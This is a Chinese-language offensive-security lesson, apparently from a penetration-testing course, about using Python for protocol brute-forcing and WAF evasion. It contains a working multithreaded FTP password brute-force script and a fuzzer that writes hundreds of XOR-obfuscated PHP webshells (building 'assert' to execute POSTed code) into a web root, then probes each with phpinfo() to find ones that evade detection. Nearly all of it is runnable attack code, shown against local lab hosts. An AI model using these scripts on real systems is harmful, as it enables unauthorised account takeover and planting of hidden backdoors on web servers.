多线程Fuzz&Waf异或免杀&爆破

43e4d0f7cf95b8f68ca33d4e11c37d4b

  • 本课知识点:协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术
  • 学习目的:掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打WAF等

利用FTP模块实现协议爆破脚本

ftp服务器的下载:https://lcba.lanzouy.com/iAMePxl378h

Snipaste_2023-09-04_05-13-48

Snipaste_2023-09-04_05-24-54

错误的账号密码连接的日志

Snipaste_2023-09-04_05-25-39

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from ftplib import FTP
import sys

"""
ftp=FTP()
ftp.encoding='GB18030'
ftp.connect("192.168.70.145",21)
ftp.login("admin","test")
list=ftp.retrlines('list')
print(list)
"""
def ftp_baopo():
    ftp = FTP()
    ftp.connect("192.168.70.145", 21)
    for username in open('user.txt'):
        for password in open('password.txt'):
            username=username.replace('\n','')
            password=password.replace('\n','')
            #print(username+'|'+password)
            ftp.login(username, password)
            list = ftp.retrlines('list')
            print(list)

if __name__ == '__main__':
    """
    ip = sys.argv[1]
    port = sys.argv[2]
    user = sys.argv[3]
    pass = sys.argv[4]
    """
    ftp_baopo()

跑了之后报错:

Snipaste_2023-09-04_05-43-54

但是这个不是代码的问题,而是你的账号密码错误了,然后ftp返回的错误

Snipaste_2023-09-04_05-43-27

可以在服务端这边发现这里还是有日志的出现,那么这个时候就需要用try,来跳过这个错误

Snipaste_2023-09-04_05-47-07

运行,从ftp服务端查看日志

Snipaste_2023-09-04_05-46-56

发现有很多错误的,然后最下面就是正常的。这里爆破的速度很慢,所以要用到多线程

多线程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import ftplib
from ftplib import FTP
import sys
import threading
import queue

def ftp_brute(ip,port):
    ftp = ftplib.FTP()
    ftp.connect(ip,port)
    while not q.empty(): #如果队列为空,返回True,反之False,这里用了not就是反过来
        dict = q.get()
        dict = dict.split('|')#用|当做分隔符
        username = dict[0]#取列表下标为0的当做用户名
        password = dict[1]#取列表下标为1的当做密码
        try:
            ftp.login(username,password)
            print(username+'|'+password+'| ok')
            list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息
            print(list)
        except ftplib.all_errors:
            print(username + '|' + password + '| no')
            pass

if __name__ == '__main__':
    ip = sys.argv[1]
    port = int(sys.argv[2])
    userfile = sys.argv[3]
    passfile = sys.argv[4]
    threading_num = int(sys.argv[5])
    q = queue.Queue()#固定写法,创建一个队列
    for username in open(userfile):
        for password in open(passfile):
            username = username.replace('\n','')
            password = password.replace('\n','')
            # print(username+'|'+password)
            q.put(username + '|' + password)#put是放,而get是获取

    for x in range(threading_num):
        t = threading.Thread(target=ftp_brute,args=(ip,port))
        t.start()

"""
首先设置几个接收参数,分别是ip,端口,用户名字典,密码字典以及线程数,用循环将用户名和密码用分隔符进行连接,然后在使用队列传参到函数中
"""

配合Fuzz实现免杀异或shell脚本

  1. 免杀异或shell原理讲解及开发思路(参考及举例:!^@,”^?等)
  2. 基于Fuzz思路生成大量Payload代码并有序命名写入网站文件中
  3. 基于多线程实现批量访问shell文件并提交测试是否正常连接回显
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import time
import requests
import threading,queue
 
def bypass_check():
    while not q.empty():
        filename = q.get()
        url = "http://127.0.0.1:8081/x/" + filename
        datas = {
            'x ': 'phpinfo();'
        }
        result = requests.post(url, data=datas).content.decode('utf-8')
        if "XIAODI-PC" in result:
            print('check ->' + filename+'->ok')
        else:
            print('check ->' + filename + '->no')
        time.sleep(1)
 
if __name__ == '__main__':
    q = queue.Queue()
    for i in range(1,127):
        for ii in range(1, 127):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            with open('D:/phpstudy/WWW/x/' + filename, 'a+') as f:
                f.write(code)
                print("Fuzz文件生成成功")
    for x in range(20):
        t = threading.Thread(target=bypass_check)
        t.start()

另外一种写法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import requests

index=0	#计数器
for i in range(0,128):
    for ii in range(0,128):
        if i^ii==97:#这里就比较了两个值异或之后是否等于a,而小迪的视频没有这个步骤
            index+=1
            code="<?php $a="+'('+"'"+chr(i)+"'"+'^'+"'"+chr(ii)+"'"+')'+'.'+"'ssert'"+';$a($_POST[x]);?>'#生成后门代码
            name=str(i)+'xd'+str(ii)+'.php'#后门文件名生成
            name='F:/phpstudy/phpStudy_64/phpstudy_pro/WWW/x/'+name#保存路径
            with open(name,'a+',encoding='utf-8') as f:
                f.write(code)
                f.close()
            print('生成了'+str(index)+"个文件")
            # 如果要进行请求的话
            header = {
                'User-Agent': 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'}
            data = {'x': 'phpinfo();'}
            try:
                url='http://127.0.0.1/x/'+str(i)+'xd'+str(ii)+'.php'
                result=requests.post(url=url,data=data,headers=header,timeout=0.5).content.decode('utf-8')
                if 'System' in result:
                    print(name+'is ok')
            except Exception as e:
                pass

但是上面这种思路已经不能免杀了

Snipaste_2023-09-04_08-53-39